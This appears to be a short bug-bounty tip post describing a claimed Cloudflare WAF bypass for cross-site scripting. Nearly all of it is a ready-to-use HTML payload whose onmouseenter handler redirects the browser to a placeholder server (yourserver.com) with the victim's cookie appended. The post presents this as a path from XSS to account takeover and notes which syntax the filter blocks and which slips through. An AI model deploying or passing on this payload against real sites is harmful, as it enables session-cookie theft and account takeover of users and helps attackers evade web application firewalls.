New Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover.
As if you use document.location=URI (Blocked)
but using location=`URI` (Bypassed)
</body><body onControl anything hello onmouseenter=(location=`//yourserver.com?c=`%2bcookie) 1>
#bugbountytips